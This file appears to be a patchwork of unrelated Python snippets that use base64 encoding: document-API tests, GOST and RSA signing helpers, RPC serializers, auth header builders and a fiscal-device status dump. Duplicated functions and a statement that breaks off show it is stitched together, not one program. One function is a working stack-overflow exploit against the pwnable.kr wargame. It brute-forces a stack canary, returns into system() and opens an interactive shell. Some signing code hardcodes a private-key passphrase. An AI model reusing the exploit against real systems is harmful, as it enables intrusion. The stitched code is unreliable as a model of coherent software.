def test_create_large_document(self):
    """Upload a 25 MiB document and verify it round-trips through download;
    then shrink the plan's storage quota and verify the same upload is
    rejected with a 400 and does not change the account's storage counter."""
    self.login_admin()
    large_body = 1024 * 1024 * 25 * 'x'  # 25 MiB of 'x'
    self.assertEqual(1024 * 1024 * 25, len(large_body))
    document = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode(large_body)[0],
        'name': 'The file.docx',
        'folder': Folder.objects.get_account_root(self.account).id,
    }).json()
    # Download what we just uploaded and compare byte-for-byte.
    document = self.acc_get('api-documents-documents-download', pk=document['id'])
    self.assertEqual(large_body, document.content)
    # Same thing, but check plan failure
    self.account.plan.max_storage = 10000  # far below the 25 MiB payload
    self.account.plan.save()
    self.account.refresh_from_db()
    storage_before = self.account.total_storage
    document = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode(large_body)[0],
        'name': 'The file.docx',
        'folder': Folder.objects.get_account_root(self.account).id,
    }, assert_status_code=400).json()
    self.assertEqual('Limit of data storage for your billing plan is exceeded, you can upgrade it in your profile!', document['message'])
    # The rejected upload must not have consumed any storage.
    self.account.refresh_from_db()
    self.assertEqual(storage_before, self.account.total_storage)
def test_update_file(self):
    """Demonstrates the document update (replacement) sequence.

    Upload a file, upload a replacement referencing it via 'old_doc',
    delete the original with change_type=UPDATED, then verify the audit
    trail exposes exactly one revision whose contents are downloadable,
    and that a plain member has no access to that revision.
    """
    self.login_admin()
    folder = self.membership_admin.private_folder
    # 1. Upload the file
    document = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('Hi there!')[0],
        'name': 'The file.docx',
        'folder': folder.id,
    }).json()
    # 2. Upload replacement
    replaced = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('Hi there! Replaced!')[0],
        'name': 'The file.docx',
        'folder': folder.id,
        'old_doc': document['id'],  # Provide 'old_doc'
    }).json()
    # 3. Delete original document, providing update change
    self.acc_delete('api-documents-documents-detail', pk=document['id'],
                    json_data={'change_type': AuditTrail.UPDATED})  # AuditTrail.UPDATED == 0
    self.assertEqual(0, Document.objects.filter(pk=document['id']).count())
    self.assertEqual(1, Document.objects.filter(pk=replaced['id']).count())
    self.assertEqual(1, AuditTrail.objects.filter(latest_version=replaced['id']).count())
    # 4. Fetch replaced object again and get revisions list
    replaced = self.acc_get('api-documents-documents-detail', pk=replaced['id']).json()
    revisions = replaced['revisions']
    self.assertEqual(1, len(revisions))
    self.assertEqual(AuditTrail.UPDATED, revisions[0]['change_type'])
    self.assertEqual(self.admin.id, revisions[0]['user'])
    self.assertEqual(1, revisions[0]['revision'])
    # 5. Fetch revision contents: use new document id and revision
    old_body = self.acc_get('api-documents-documents-download-revision', pk=replaced['id'], revision=1).content
    self.assertEqual('Hi there!', old_body)
    documents = self.acc_get('api-documents-documents-list', data={'folder': self.membership_admin.private_folder.id}).json()
    self.assertEqual(1, len(documents))
    self.assertEqual(1, len(documents[0]['revisions']))
    # Check access is checked
    self.login_member()
    self.acc_get('api-documents-documents-download-revision', pk=replaced['id'], revision=1, assert_status_code=403)
def get_file_hash(self, file_path):
    """Compute the GOST hash of *file_path* with CryptoPro's csptest.exe.

    Returns the hash as a single-line base64 string.  On tool failure the
    tool's output (cp866 console encoding) is logged and the
    subprocess.CalledProcessError is re-raised.
    """
    # Prefer the 32-bit install path; fall back to the 64-bit one.
    csptest_path = 'C:\\Program Files (x86)\\Crypto Pro\\CSP\\csptest.exe'
    if not os.path.exists(csptest_path):
        csptest_path = 'C:\\Program Files\\Crypto Pro\\CSP\\csptest.exe'
    # csptest writes the hash into a file; hand it an empty temp path.
    hashtmp_f, hashtmp_fn = tempfile.mkstemp()
    os.close(hashtmp_f)
    args = [
        csptest_path, 'csptest.exe', '-keyset', '-hash', 'GOST',
        '-container', self.__container, '-keytype', 'exchange',
        '-in', os.path.abspath(file_path),
        '-hashout', hashtmp_fn
    ]
    try:
        out = subprocess.check_output(args, stderr=subprocess.STDOUT)
        self.log.debug(out.decode(encoding='cp866'))
        with open(hashtmp_fn, 'rb') as f:
            hsh = f.read()
        # [:-1] drops the trailing newline the base64 encoder appends;
        # replace() removes internal line wrapping.
        return base64_encode(hsh)[0][:-1].decode().replace('\n', '')
    except subprocess.CalledProcessError as e:
        # Was a bare `except:` with an `'out' in locals()` hack; log the
        # captured output directly, consistent with sign_csp().
        self.log.error(e.output.decode(encoding='cp866'))
        raise
    finally:
        os.remove(hashtmp_fn)
def __encode_high_scores(high_score_list):
    """Serialize *high_score_list* to JSON and return it base64-encoded.

    Returns a utf-8 str holding the MIME-style (line-wrapped,
    newline-terminated) base64 encoding of the JSON text.
    """
    # -- Jsonify the pairs
    high_score_list_encoded = json.dumps(high_score_list)
    # BUG FIX: base64.base64_encode does not exist (AttributeError at
    # runtime).  encodebytes() produces the same line-wrapped output the
    # codecs-style encoder would have returned in element [0].
    high_score_list_encoded_b64 = base64.encodebytes(
        high_score_list_encoded.encode('utf-8'))
    return high_score_list_encoded_b64.decode('utf-8')
def test_delete(self):
    """Deleting a document removes its RecentActivity entry and leaves a
    single DELETED audit-trail revision behind."""
    self.login_admin()
    root = Folder.objects.get_account_root(self.account)
    file_contents = 'Hi there!'
    document = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode(file_contents)[0],
        'name': 'The file.docx',
        'folder': root.id,
    }).json()
    # Creation is recorded as an ADDITION activity...
    self.assertEqual(1, RecentActivity.objects.filter(account=self.account,
                                                      content_type=ContentType.objects.get_for_model(Document),
                                                      object_id=document['id'],
                                                      action_flag=RecentActivity.ADDITION).count())
    self.acc_delete('api-documents-documents-detail', pk=document['id'])
    # Recent activity is dropped
    self.assertEqual(0, RecentActivity.objects.filter(account=self.account,
                                                      content_type=ContentType.objects.get_for_model(Document),
                                                      object_id=document['id'],
                                                      action_flag=RecentActivity.ADDITION).count())
    # ...while the audit trail keeps exactly one DELETED revision.
    revisions = list(AuditTrail.objects.filter(latest_version=document['id']))
    self.assertEqual(1, len(revisions))
    self.assertEqual(AuditTrail.DELETED, revisions[0].change_type)
def sign_file(password, file_to_sign, private_key_file, sig_filename):
    """Sign *file_to_sign* with a passphrase-protected PEM private key.

    The signature is computed over the file's precomputed digest using
    PKCS#1 v1.5 padding, base64-encoded, and written to *sig_filename*
    between BEGIN/END SIGNATURE marker lines.
    """
    backend = default_backend()
    myhash, digest = getMyhashDigest(file_to_sign)
    # load the private key from task 2; the passphrase must be bytes
    password = bytes(password, 'utf-8')
    with open(private_key_file, 'rb') as file:
        private_key = serialization.load_pem_private_key(
            data=file.read(), password=password, backend=backend)
    # hashed data needs to be padded so it fits correctly
    pad = asympadding.PKCS1v15()
    # Prehashed: we sign the digest we already computed, not the raw data.
    sig = base64_encode(
        private_key.sign(data=digest, padding=pad,
                         algorithm=utils.Prehashed(myhash)))[0]
    # FIX: use a context manager so the file is closed even on write errors.
    with open(sig_filename, "wb") as sig_file:
        sig_file.write(b"-----BEGIN SIGNATURE-----\n")
        sig_file.write(sig)
        sig_file.write(b"-----END SIGNATURE-----\n")
def reduce(digest_hex):
    """Reduce a hex digest to an (up to) 5-letter uppercase password.

    Base64-encodes the digest bytes and collects the first five alphabetic
    characters (uppercased, restricted to *alphabet*).  Prints a warning
    and still returns the shorter string when fewer than five are found.
    """
    b64_representation = base64_encode(bytes.fromhex(digest_hex))
    new_password2 = ""
    for i in range(len(b64_representation[0])):
        decoded_byte = chr(b64_representation[0][i])
        if decoded_byte.isalpha():
            if decoded_byte.upper() in alphabet:
                new_password2 = new_password2 + decoded_byte.upper()
        if len(new_password2) == 5:
            break
    # NOTE: the old code also computed a second candidate password from the
    # first five base64 characters, but that result was never returned —
    # dead code (and it could raise on short inputs), so it was removed.
    if len(new_password2) != 5:
        print("reduce not to 5")
    return new_password2
def sign_file(file_name, backend_sign):
    """SHA-256-hash *file_name*, sign the digest with kr.pem and write the
    base64 signature to file.sig (RSA-PSS, max salt length)."""
    with open(file_name, 'rb') as file:
        data_to_encrypt = file.read()
    myhash = hashes.SHA256()
    # BUG FIX: was `hashes.Hash(myhash, backend)` — referencing a global
    # instead of the `backend_sign` parameter.
    hasher_sha256 = hashes.Hash(myhash, backend_sign)
    hasher_sha256.update(data_to_encrypt)
    digest = hasher_sha256.finalize()
    # load the private key from task 2 (passphrase-protected PEM)
    password = bytes("hello", 'utf-8')
    with open("kr.pem", 'rb') as file:
        private_key = serialization.load_pem_private_key(
            data=file.read(), password=password, backend=backend_sign)
    # hashed data needs to be padded so it fits correctly
    pad = asympadding.PSS(mgf=asympadding.MGF1(hashes.SHA256()),
                          salt_length=asympadding.PSS.MAX_LENGTH)
    sig = base64_encode(
        private_key.sign(data=digest, padding=pad,
                         algorithm=utils.Prehashed(myhash)))[0]
    # FIX: context manager instead of a leaked open file handle.
    with open("file.sig", "wb") as sig_file:
        sig_file.write(b"-----BEGIN SIGNATURE-----\n")
        sig_file.write(sig)
        sig_file.write(b"-----END SIGNATURE-----\n")
    print("Signed file with private key and wrote to file.sig")
def __init__(self, value_id: int, data: bytes, *args, **kwargs):
    """Build a STORE RPC carrying *data* for *value_id*.

    *data* travels base64-encoded.  BUG FIX: str(base64_encode(data))
    stringified the whole (bytes, length) tuple — take element [0] and
    decode it, as to_dict_representation() does for rpc_uuid.
    """
    super().__init__(rpc_command="STORE",
                     command_arg={
                         "value_id": str(value_id),
                         "data": base64_encode(data)[0].decode()
                     }, *args, **kwargs)
def testReadSingleImage(self):
    """Round-trip one PNG through the protocol's read()."""
    path = '../../../../data/test-images/cat_programming.png'
    # FIX: close the file handle deterministically instead of leaking it.
    with open(path, "rb") as f:
        file_bytes = bytearray(f.read())
        name = f.name
    # 4-byte big-endian length prefix precedes the image payload.
    len_bytes = bytearray(struct.pack('>i', len(file_bytes)))
    # FIX: str(bytearray) yields the repr text on Python 3, so the repr —
    # not the payload — would be base64-encoded; bytes() gives the raw
    # prefixed payload on both Python 2 and 3.
    _, images = self.protocol.read(
        name + '\t' + base64_encode(bytes(len_bytes + file_bytes))[0])
    exp = skio.imread(path)
    assert_array_equal(images[0], exp)
def testReadSingleImage(self):
    """Round-trip one PNG through the protocol's read()."""
    path = '../../../../data/test-images/cat_programming.png'
    # FIX: close the file handle deterministically instead of leaking it.
    with open(path, "rb") as f:
        file_bytes = bytearray(f.read())
        name = f.name
    # 4-byte big-endian length prefix precedes the image payload.
    len_bytes = bytearray(struct.pack('>i', len(file_bytes)))
    # FIX: str(bytearray) yields the repr text on Python 3, so the repr —
    # not the payload — would be base64-encoded; bytes() gives the raw
    # prefixed payload on both Python 2 and 3.
    _, images = self.protocol.read(
        name + '\t' + base64_encode(bytes(len_bytes + file_bytes))[0])
    exp = skio.imread(path)
    assert_array_equal(images[0], exp)
def testReadMultipleImages(self):
    """read() must decode several concatenated length-prefixed payloads."""
    path = '../../../../data/test-images/cat_programming.png'
    # FIX: close the file handle deterministically instead of leaking it.
    with open(path, "rb") as f:
        file_bytes = bytearray(f.read())
        name = f.name
    # 4-byte big-endian length prefix precedes each image payload.
    len_bytes = bytearray(struct.pack('>i', len(file_bytes)))
    # FIX: str(bytearray) yields the repr text on Python 3; bytes() gives
    # the raw prefixed payload on both Python 2 and 3.
    # five times the same image
    encoded = base64_encode(bytes(len_bytes + file_bytes))[0]
    _, images = self.protocol.read(name + '\t' + encoded * 5)
    exp = skio.imread(path)
    for img in images:
        assert_array_equal(img, exp)
def _getHeaders(self, acceptType="application/json", contentType="application/json", x_forwarded_host=None):
    """Build default request headers with HTTP Basic authentication.

    NOTE(review): x_forwarded_host is accepted but never used here — kept
    for interface compatibility; confirm whether callers expect it to be
    applied as an X-Forwarded-Host header.
    """
    headers = {"Accept": acceptType, "Content-type": contentType}
    # FIX: encode "user:password" explicitly (the base64 codec needs bytes
    # on Python 3), don't shadow the len() builtin, and don't call str()
    # on the encoded bytes — that would embed the b'...' repr in the
    # header.  rstrip() drops the trailing newline the encoder appends.
    credential_encode, _length = base64_encode(
        ("%s:%s" % (self.username, self.password)).encode("utf-8"))
    headers['Authorization'] = "Basic " + credential_encode.decode("ascii").rstrip()
    return headers
def testReadMultipleImages(self):
    """read() must decode several concatenated length-prefixed payloads."""
    path = '../../../../data/test-images/cat_programming.png'
    # FIX: close the file handle deterministically instead of leaking it.
    with open(path, "rb") as f:
        file_bytes = bytearray(f.read())
        name = f.name
    # 4-byte big-endian length prefix precedes each image payload.
    len_bytes = bytearray(struct.pack('>i', len(file_bytes)))
    # FIX: str(bytearray) yields the repr text on Python 3; bytes() gives
    # the raw prefixed payload on both Python 2 and 3.
    # five times the same image
    encoded = base64_encode(bytes(len_bytes + file_bytes))[0]
    _, images = self.protocol.read(name + '\t' + encoded * 5)
    exp = skio.imread(path)
    for img in images:
        assert_array_equal(img, exp)
def reduce2(digest):
    """Reduce *digest* (bytes) to an up-to-5-letter uppercase password.

    Walks the base64 encoding of the digest, prepending each alphabetic
    character uppercased, and stops once five letters are collected.
    """
    # BUG FIX: base64_encode() returns a (bytes, length) tuple; the old
    # code iterated over the tuple itself, so bytes([b64_representation[m]])
    # raised TypeError on the first element.  Take the encoded bytes.
    encoded = base64_encode(digest)[0]
    new_password = ""
    for m in range(len(encoded)):
        one_byte = bytes([encoded[m]])
        char = one_byte.decode()
        print("char", char)
        if char.isalpha():
            # Newest letter goes to the front (reverse order, as before).
            new_password = char.upper() + new_password
            print("new password", new_password)
        if len(new_password) == 5:
            break
    return new_password
def to_dict_representation(self):
    """Serialize this RPC (sender node, type, extra parts, uuid) to a dict."""
    ip, port = self.node.ip_info[0], self.node.ip_info[1]
    rpc = {
        "node": {"id": self.node.node_id, "ip": ip, "port": port},
        "type": self.rpc_type,
    }
    # Child classes may contribute extra key/value pairs.
    if self.append_part:
        rpc.update(self.append_part)
    # The RPC uuid travels as base64-encoded raw uuid bytes.
    rpc["rpc_uuid"] = base64_encode(self.rpc_uuid.bytes)[0].decode()
    return rpc
def test_meeting_documents(self):
    """Create a BOARD_BOOK document, attach it to a new meeting, and verify
    the meeting details expose a working board-book download URL."""
    self.login_admin()
    document = self.acc_post_json(
        'api-documents-documents-list', {
            'body': base64_encode('test document')[0],
            'name': 'The file.docx',
            'type': Document.BOARD_BOOK,
            'folder': None,
        }).json()
    # Schedule a one-hour meeting tomorrow 12:00-13:00 UTC.
    meeting_json = self.acc_post_json(
        'api-meetings-meetings-list', {
            'start': (now().replace(tzinfo=pytz.utc, hour=12, minute=0, second=0, microsecond=0) + timedelta(days=1)).isoformat(),
            'end': (now().replace(tzinfo=pytz.utc, hour=13, minute=0, second=0, microsecond=0) + timedelta(days=1)).isoformat(),
            'name': 'Test meeting',
            'description': 'describe it! Now.',
            'location': 'in memory',
            'committee': None,
            'documents': [document['id']],
            'extra_members': [],
        }).json()
    details = self.acc_get('api-meetings-meetings-detail', pk=meeting_json['id']).json()
    self.assertTrue(details['board_book'])
    # The board book must be downloadable and round-trip its contents.
    document = self.client.get(details['board_book']['download_url'])
    self.assertEqual('test document', document.content)
def __init__(self, url, user=None, passwd=None, basic_token=None, **kwargs):
    """REST client wrapper for a JIRA-style API.

    Pass either *basic_token* (a ready base64 "user:pass" string) or
    *user*/*passwd*, from which the token is derived.
    """
    extra_headers = {
        'accept': 'application/json',
        'content-type': 'application/json'
    }
    if user is not None and passwd is not None:
        user_pass = bytes("%s:%s" % (user, passwd), 'utf-8')
        # BUG FIX: base64_encode() returns a (bytes, length) tuple; the old
        # str(basic_token) put the tuple repr into the Authorization
        # header.  Take the encoded bytes, decode, drop the trailing
        # newline the encoder appends.
        basic_token = base64_encode(user_pass)[0].decode('ascii').strip()
    if basic_token is not None:
        auth = "Basic %s" % str(basic_token)
        extra_headers['authorization'] = auth
    props = ConnectionProperties(
        api_url=kwargs.pop('api_url', url),
        secure_http=True,
        extra_headers=extra_headers,
        url_prefix='/rest/api/2'
    )
    self.setClient(Client())
    self.setConnectionProperties(props)
def main() -> None:
    """Brute-force the time-based captcha/canary and exploit the remote.

    Iterate over several time diffs since there's a changing delay between
    connecting to the pwnable.kr server and generating the hash locally.
    Since the timestamp for generating the hash must be the exact same as
    the remote, retry with a small range of offsets.
    """
    for time_diff in range(-5, 1):
        # Get the original hash
        connection = remote('pwnable.kr', 9002)
        # Get the captcha (hash) from the connection
        connection.readuntil(':')
        original_hash = int(connection.read().decode().strip())
        # Calculate the canary value
        canary = calculate_canary(original_hash, time_diff)
        # Response to the captcha
        connection.sendline(str(original_hash).encode())
        # Craft the payload and send it: buffer filler, canary, 12 bytes of
        # padding, return address, then a pointer just past the payload.
        payload = b'A' * BUFFER_SIZE + p32(canary) + 12 * b'A' + p32(
            SYSTEM_CALL_ADDRESS)
        payload += p32(G_BUF_ADDRESS + calculate_base64_length(len(payload) + 4))
        # The target base64-decodes its input; strip the encoder's newlines
        # so the payload stays one line, then append the shell command.
        payload = base64_encode(payload)[0].replace(b'\n', b'') + SHELL_COMMAND
        connection.sendline(payload)
        # Receive 4 lines, which actually means, read until received stack smashing detected.
        # If the timeout reached and 4 lines were not received, We managed to open a shell :)
        output = b'\n'.join(connection.recvlines(4, timeout=3)).decode()
        if 'stack smashing detected' not in output:
            # Make interactive to get the gained shell :)
            connection.interactive()
            break
        else:
            print(f'with diff {time_diff}: Stack smashing detected :(')
def read_from_file(aPath, encode=True):
    """Read the file at *aPath*.

    With encode=True (default) return the base64-encoded file contents
    (bytes, as produced by the codecs-style encoder); otherwise return the
    file's text.
    """
    # FIX: mode 'rU' was removed in Python 3.11; the base64 codec also
    # needs bytes, so read binary when encoding.  Context managers replace
    # the previously leaked file handle.
    if encode:
        with open(aPath, 'rb') as aFile:
            return base64_encode(aFile.read())[0]
    with open(aPath, 'r') as aFile:
        return aFile.read()
def encode_base64(string_to_encode):
    """Base64-encode *string_to_encode* and return the encoded bytes.

    The codecs-style encoder yields a (data, length) tuple; only the
    encoded data is of interest here.
    """
    encoded_data, _consumed = base64_encode(string_to_encode)
    return encoded_data
# Dump status/limits of the attached TSE (fiscal signature device).
# The printed labels are German and intentionally left untouched.
print('Zeit bis zum nächsten Selbsttest:', TSE.info.timeUntilNextSelfTest)
print('Zeit zwischen zwei Time-Syncs:', TSE.info.maxTimeSynchronizationDelay)
print('Maximale Dauer einer offenen Transaktion:', TSE.info.maxUpdateDelay)
print('Zahl der offenen Transaktionen: %i / %i' % (TSE.info.startedTransactions, TSE.info.maxStartedTransactions))
print('Zahl der bisherigen Signaturen: %i / %i (noch %i übrig)' % (TSE.info.createdSignatures, TSE.info.maxSignatures, TSE.info.remainingSignatures))
print('TSE-Beschreibung:', TSE.info.tseDescription, 'Customization:', TSE.info.customizationIdentifier.decode('ascii'))
print('Signatur-Algorithmus:', TSE.signatureAlgorithm())
# Public key is printed base64-encoded, serial as hex.
print('Pubkey:', base64_encode(TSE.info.tsePublicKey))
print('Serial:', bytes(TSE.info.tseSerialNumber).hex())
print('Zahl der aktiven Clients: %i / %i' % (TSE.info.registeredClients, TSE.info.maxRegisteredClients))
print('Zertifikat-Ablaufdatum:', TSE.info.certificateExpirationDate)
print('Log-Time-Format:', TSE.logTimeFormat())
print('Hardware-Version: %i.%i.%i' % TSE.info.hardwareVersion)
print('Software-Version: %i.%i.%i' % TSE.info.softwareVersion)
print('Library-Version:', TSE.getVersion())
print('TSE Form-Factor:', TSE.info.formFactor)
# Flash wear/health report.
TSE.flash_health_summary()
# Optional reset path, guarded by the '--reset' CLI flag; its body
# continues beyond this chunk.
if len(sys.argv) > 1 and sys.argv[1] == '--reset':
def test_document(self): self.login_admin() # Test create # =========== error = self.acc_post_json('api-documents-documents-list', {}, assert_status_code=400).json() self.assertEqual({ "body": ["This field is required."], "name": ["This field is required."], 'folder': ['This field is required.'], 'detail': WRONG_REQUEST}, error) root = Folder.objects.get_account_root(self.account) storage_before = self.account.total_storage file_contents = 'File contents' document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode(file_contents)[0], 'name': 'The file.docx', 'folder': root.id, }).json() self.assertEqual('The file.docx', document['name']) # Check that storage is updated self.account.refresh_from_db() self.assertEqual(len(file_contents), self.account.total_storage - storage_before) self.assertEqual(1, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.ADDITION).count()) documents = self.acc_get('api-documents-documents-list').json() self.assertEqual(1, len(documents)) self.assertEqual(document['id'], documents[0]['id']) document_content = self.acc_get('api-documents-documents-download', pk=document['id']) self.assertEqual(file_contents, document_content.content) # Update: # ----------- updated_document = dict(document) updated_document['name'] = 'Updated.docx' updated_document['content'] = 'MUST BE IGNORED' self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=updated_document) self.assertEqual(1, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.CHANGE).count()) check_document = self.acc_get('api-documents-documents-detail', pk=document['id']).json() self.assertEqual('Updated.docx', check_document['name']) document_content = self.acc_get('api-documents-documents-download', pk=document['id']) 
self.assertEqual(file_contents, document_content.content) # Check move sub_folder = Folder.objects.create(parent=root, name='Test sub_folder', account=self.account) updated_document['folder'] = sub_folder.id self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=updated_document) sub_folder.refresh_from_db() self.assertEqual(1, len(sub_folder.documents.all())) self.assertEqual('Updated.docx', sub_folder.documents.all()[0].name) # Delete it: # -------- self.acc_delete('api-documents-documents-detail', pk=document['id']) self.acc_get('api-documents-documents-detail', pk=document['id'], assert_status_code=404)
def test_access(self):
    """Folder/document permissions for a common (non-admin) member."""
    # All previous tests used admin, which is kind of a god, i.e. can do anything. Let's test common member.
    self.login_member()
    root = Folder.objects.get_account_root(self.account)
    # User can't create folders in root
    self.acc_post_json('api-documents-folders-list', {
        'name': "The folder",
        'parent': root.id
    }, assert_status_code=403)
    # Nor documents
    self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': root.id,
    }, assert_status_code=403)
    # He can, inside his own folder
    folder = self.acc_post_json('api-documents-folders-list', {
        'name': "The folder",
        'parent': self.membership.private_folder.id
    }).json()
    # And subfolder of it
    sub_folder = self.acc_post_json('api-documents-folders-list', {
        'name': "The subfolder",
        'parent': folder['id']
    }).json()
    # And files
    document = self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': self.membership.private_folder.id,
    }).json()
    # And move documents
    document['folder'] = sub_folder['id']
    self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=document)
    # But not in other's folder:
    self.acc_post_json('api-documents-folders-list', {
        'name': "The folder",
        'parent': self.membership_admin.private_folder.id,
    }, assert_status_code=403)
    # Nor documents
    self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': self.membership_admin.private_folder.id,
    }, assert_status_code=403)
    # And can't into committee he isn't in
    committee = CommitteeFactory(chairman=self.membership_admin)
    self.assertTrue(committee.folder)
    self.acc_post_json('api-documents-folders-list', {
        'name': "The folder",
        'parent': committee.folder.id,
    }, assert_status_code=403)
    # Nor documents
    self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': committee.folder.id,
    }, assert_status_code=403)
    # But can as soon as he becomes a member
    committee.memberships.add(self.membership)
    self.acc_post_json('api-documents-folders-list', {
        'name': "The folder",
        'parent': committee.folder.id,
    })
    # And documents too
    self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': committee.folder.id,
    })
    # Other account must have no access to our documents, let's just check it
    self.init_second_account()
    self.login_admin2()
    self.acc_get('api-documents-documents-list', assert_status_code=403)
    self.acc_post_json('api-documents-documents-list', {
        'body': base64_encode('File contents')[0],
        'name': 'The file.docx',
        'folder': root.id,
    }, assert_status_code=403)
def sign_csp(self, xml):
    """Sign *xml* for SMEV using CryptoPro's csptest.exe (GOST algorithms).

    Returns an XMLDSig <ds:Signature> element (exclusive C14N plus the
    SMEV transform) containing the base64 digest, signature value and the
    exported certificate.  NOTE(review): on certificate-export failure the
    method returns the tool's error text instead of raising — confirm
    callers handle that.
    """
    csptest_path = 'C:\\Program Files (x86)\\Crypto Pro\\CSP\\csptest.exe'
    # Temp files: input XML, signature output, digest output.
    intmp_f, intmp_fn = tempfile.mkstemp()
    outtmp_f, outtmp_fn = tempfile.mkstemp()
    hashtmp_f, hashtmp_fn = tempfile.mkstemp()
    try:
        if isinstance(xml, str):
            xml = xml.encode()
        os.write(intmp_f, xml)
        os.close(intmp_f)
        os.close(outtmp_f)
        os.close(hashtmp_f)
        args = [
            csptest_path, 'csptest.exe', '-keyset', '-sign', 'GOST', '-hash', 'GOST',
            '-container', self.__container, '-keytype', 'exchange',
            '-in', intmp_fn, '-out', outtmp_fn, '-hashout', hashtmp_fn
        ]
        out = subprocess.check_output(args, stderr=subprocess.STDOUT)
        self.log.debug(out.decode(encoding='cp866'))
        with open(outtmp_fn, 'rb') as f:
            sgn = f.read()
        # Signature bytes are reversed before encoding — presumably the
        # CSP output byte order differs from what XMLDSig expects; confirm.
        sgn = sgn[::-1]
        # [:-1] drops the encoder's trailing newline; replace() removes
        # internal line wrapping.
        sign = base64_encode(sgn)[0][:-1].decode().replace('\n', '')
        with open(hashtmp_fn, 'rb') as f:
            hsh = f.read()
        hsh_bytes = base64_encode(hsh)[0][:-1].decode().replace('\n', '')
    except subprocess.CalledProcessError as e:
        # Log the tool's output (cp866 console encoding) and re-raise.
        self.log.error(e.output.decode(encoding='cp866'))
        raise
    finally:
        os.remove(intmp_fn)
        os.remove(outtmp_fn)
        os.remove(hashtmp_fn)
    # Export the signing certificate for the <ds:X509Certificate> element.
    outtmp_f, outtmp_fn = tempfile.mkstemp()
    try:
        os.close(outtmp_f)
        args = [
            csptest_path, 'csptest.exe', '-keyset',
            '-container', self.__container, '-keytype', 'exchange',
            '-expcert', outtmp_fn
        ]
        out = subprocess.check_output(args, stderr=subprocess.STDOUT)
        self.log.debug(out.decode(encoding='cp866'))
        with open(outtmp_fn, 'rb') as f:
            crt = f.read()
        cert = base64_encode(crt)[0][:-1]
    except subprocess.CalledProcessError as e:
        self.log.error(e.output.decode(encoding='cp866'))
        return e.output.decode(encoding='cp866')
    finally:
        os.remove(outtmp_fn)
    if b'Signature xmlns' in xml:
        # TODO: Template signature
        pass
    return '<ds:Signature ' \
           'xmlns:ds="http://www.w3.org/2000/09/xmldsig#">' \
           '<ds:SignedInfo>' \
           '<ds:CanonicalizationMethod ' \
           'Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>' \
           '<ds:SignatureMethod ' \
           'Algorithm="http://www.w3.org/2001/04/xmldsig-more#gostr34102001-gostr3411"/>' \
           '<ds:Reference URI="#SIGNED_BY_CALLER"><ds:Transforms>' \
           '<ds:Transform ' \
           'Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>' \
           '<ds:Transform ' \
           'Algorithm="urn://smev-gov-ru/xmldsig/transform"/>' \
           '</ds:Transforms>' \
           '<ds:DigestMethod ' \
           'Algorithm="http://www.w3.org/2001/04/xmldsig-more#gostr3411"/>' \
           '<ds:DigestValue>' + hsh_bytes + \
           '</ds:DigestValue></ds:Reference></ds:SignedInfo>' \
           '<ds:SignatureValue>' + sign + \
           '</ds:SignatureValue><ds:KeyInfo><ds:X509Data>' \
           '<ds:X509Certificate>' + cert.decode() + \
           '</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>'
# Sign encryptme.txt: SHA-256 digest, RSA-PSS signature, base64 output.
with open("encryptme.txt", 'rb') as file:
    data_to_encrypt = file.read()
myhash = hashes.SHA256()
hasher_sha256 = hashes.Hash(myhash, backend)
hasher_sha256.update(data_to_encrypt)
digest = hasher_sha256.finalize()
# load the private key from task 2 (passphrase-protected PEM)
password = bytes("hello", 'utf-8')
with open("kr.pem", 'rb') as file:
    private_key = serialization.load_pem_private_key(data=file.read(),
                                                     password=password,
                                                     backend=backend)
# hashed data needs to be padded so it fits correctly
pad = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)
# Prehashed: the digest was computed above, so sign it directly.
sig = base64_encode(
    private_key.sign(data=digest, padding=pad,
                     algorithm=utils.Prehashed(myhash)))[0]
# FIX: context manager ensures the signature file is closed even on error
# (the old code never closed the handle it opened).
with open("file.sig", "wb") as sig_file:
    sig_file.write(b"-----BEGIN SIGNATURE-----\n")
    sig_file.write(sig)
    sig_file.write(b"-----END SIGNATURE-----\n")